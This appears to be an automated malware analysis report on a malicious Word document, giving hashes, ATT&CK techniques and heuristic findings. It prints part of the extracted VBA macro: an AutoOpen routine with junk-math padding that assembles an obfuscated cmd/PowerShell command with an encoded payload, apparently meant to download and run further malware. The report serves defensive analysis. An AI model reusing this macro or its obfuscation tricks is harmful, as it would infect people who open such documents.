Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84186dd72b75a7e8…

MALICIOUS

Office (OLE)

107.0 KB Created: 2018-06-07 07:16:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 5f20f20cb9f0d01f9eac5f7432f78ea7 SHA-1: 828eecd255bdf1a9fd158651d64ef02a354f2a93 SHA-256: 84186dd72b75a7e8eb6d0835d42591ea34abe9ea8ff8d3bd5843c74424c9db4c
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the execution of a Shell() command. This command appears to be constructing a string that includes obfuscated command-line arguments, likely intended to download and execute a secondary payload. The specific command constructed is 'md NVmKNFQo PKzncVkYYGzwO AZPZpTtqBdXj EC kZlj TkoBWomK & %^c^o^m^S^p^E^c^% %^c^', which is highly suspicious.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14663 bytes
SHA-256: 0ad2ec4e3c6765ce0f5bea47a9d361cb26644a97dcb0a2be1b70a6ad029ce2f6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vcXuWiwh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function BjtzaYT()
On Error Resume Next
iYYOB = Tan(UNlIvt _
* Tan(SJFrPc * Int(aJIZXk * Sqr(23129) / VaDRI + Fix(83627)) / 93076 * Round(54740 / Log(33597 - GbJuD) + 32284 - NdFnB)) _
/ 86886 + Log(16815))
kmYQz = Tan(QiNrKE _
* Tan(lzWhoU * Int(AjfGr * Sqr(22247) / HGTUh + Fix(90295)) / 16412 * Round(45435 / Log(9535 - MRjqz) + 92220 - sMjcf)) _
/ 68796 + Log(11709))
BjtzaYT = miidDu + Shell(azjuJw + Chr(IcVhrsdUFG + vbKeyC + SQtNVnhWQ) + bNwSUIAJnih + hZCBiz + XGXadUoQGsG + zJjrZAiw + cPpOVKz + kTjjOHS, 57000 - 57000)
YAIAH = Tan(YnjJY _
* Tan(XdJVNs * Int(UWoSDn * Sqr(54220) / fbibW + Fix(25369)) / 14610 * Round(17941 / Log(90015 - WzFni) + 99805 - YBfPCO)) _
/ 27653 + Log(75185))
End Function
Sub Autoopen()
On Error Resume Next
lqjhFN = Tan(EtMwiB _
* Tan(PUOVqv * Int(hsomim * Sqr(92679) / cNTnlc + Fix(32679)) / 49720 * Round(25438 / Log(90666 - SAuRB) + 95232 - UQvnt)) _
/ 44993 + Log(84605))
BjtzaYT
Dwuvab = Tan(GQwiuQ _
* Tan(wuBZh * Int(snanoI * Sqr(33866) / DoTwvs + Fix(46646)) / 35756 * Round(60047 / Log(34528 - iktdT) + 44941 - FPRAm)) _
/ 37554 + Log(80478))
End Sub



Attribute VB_Name = "zQYHGSJDC"
Function bNwSUIAJnih()
On Error Resume Next
DikLJD = Tan(WusBqP _
* Tan(UCQVRF * Int(hCjIwi * Sqr(49632) / PzUqS + Fix(95360)) / 98167 * Round(36497 / Log(91229 - jCQjkt) + 40288 - aNTFj)) _
/ 31730 + Log(85785))
QpVREDrQSL = "md " + "NVmKNFQo " + "PKzncVkYYGzwO" + "AZPZpTtqBdXj EC" + "kZlj" + "TkoBWomK &" + "     %^c^o^" + "m^S^p^E^c" + "^%" + "     %^c^o^m"
WjDDN = Tan(Nzish _
* Tan(zvVjVo * Int(CTzSnn * Sqr(67956) / MDJQD + Fix(95475)) / 32139 * Round(52750 / Log(36220 - sTOpR) + 9820 - MUPirj)) _
/ 69177 + Log(89296))
IJkLUhKcbwl = "^S^p^E^c^% " + "    /V   " + "      /" + "c      " + "     set %TsLhJ" + "wV" + "KkwjbUF" + "Z%=TQtWfWoh" + "&&set %oVsss"
phYNQP = Tan(MAwVcd _
* Tan(jUDUd * Int(TNCsb * Sqr(52989) / TdUTZ + Fix(42210)) / 40804 * Round(14883 / Log(67670 - EzcpC) + 77579 - kOiSi)) _
/ 20612 + Log(77695))
ZcJPnNZ = "nQiWK%=p&&set" + " %DWQw" + "niHHEbC%=o^w" + "&&set %OPvPmYtl" + "DJ" + "Zwp"
GZPcf = Tan(mozKif _
* Tan(vGHuzR * Int(VBfQZj * Sqr(15392) / szlSj + Fix(9013)) / 36930 * Round(93566 / Log(11120 - DVSKif) + 37384 - tpHbY)) _
/ 71942 + Log(86616))
lnwkwi = "vN%=cuRm" + "tKO" + "NLfhG&&set" + " %" + "AWiGdpwWc" + "nF%=!%oV"
bNwSUIAJnih = QpVREDrQSL + IJkLUhKcbwl + ZcJPnNZ + lnwkwi
End Function
Function hZCBiz()
On Error Resume Next
tFtwDw = Tan(avzZP _
* Tan(XbJCPt * Int(jLWAzQ * Sqr(75642) / ERbzZ + Fix(81447)) / 21891 * Round(26049 / Log(5722 - bFwrO) + 64284 - DJVNz)) _
/ 47838 + Log(16942))
PoskzHiRnIw = "sssnQiWK%!&&" + "set %vPfzDiT" + "uCG" + "YMEv" + "Y%=fbTYCIt" + "l&&s" + "et %z" + "Twc"
wKijtA = Tan(LFViVZ _
* Tan(IMOHun * Int(zowouu * Sqr(14637) / FGsSH + Fix(55517)) / 61960 * Round(56139 / Log(57767 - GptqV) + 69646 - jNAJw)) _
/ 82580 + Log(57838))
oaZZjkZf = "asSO%=" + "e^r&&set %itVN" + "jnwND" + "iWi%=!%D" + "WQwniHHEbC%" + "!&&set %cGov" + "REAdPijjJ%=s&&" + "se" + "t %ECoEAhDH" + "qnpnicu%="
DzVlu = Tan(GftzPl _
* Tan(RNcjk * Int(owuISM * Sqr(55878) / jHIHP + Fix(28177)) / 95334 * Round(8562 / Log(59991 - rjKzK) + 54 - GwIPAX)) _
/ 50199 + Log(27791))
suTvf = "cTiWWFhz" + "&&set %" + "QzjWFfDjt%=h" + "e&&set %" + "MuZ" + "tK" + "qpEvmb" + "P%=ll&&!%" + "AWiGdpwWcnF%!" + "!%itVNjnwNDiWi"
pWIpCZ = Tan(maXls _
* Tan(WFNhSr * Int(noouR * Sqr(24034) / Uwjki + Fix(85916)) / 42493 * Round(47902 / Log(51138 - pHSRYZ) + 73867 - wGbDB)) _
/ 35205 + Log(9850))
UJfqalj = "%!!%zTwcasS" + "O%!!%cGov" + "RE" + "AdPijjJ%!" + "!%QzjWFfD" + "jt%!!%" + "MuZtKqpEvmbP%! " + " -e KAAgAG4AZ" + "QBXAC0"
NGBiNX = Tan(LznunC _
* Tan(dwiRs * Int(ZjPPB * Sqr(61220) / GmQwN + Fix(59786)) / 99893 * Round(60157 / Log(30503 - riSRG) + 38547 - fzMzcd)) _
/ 47832 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.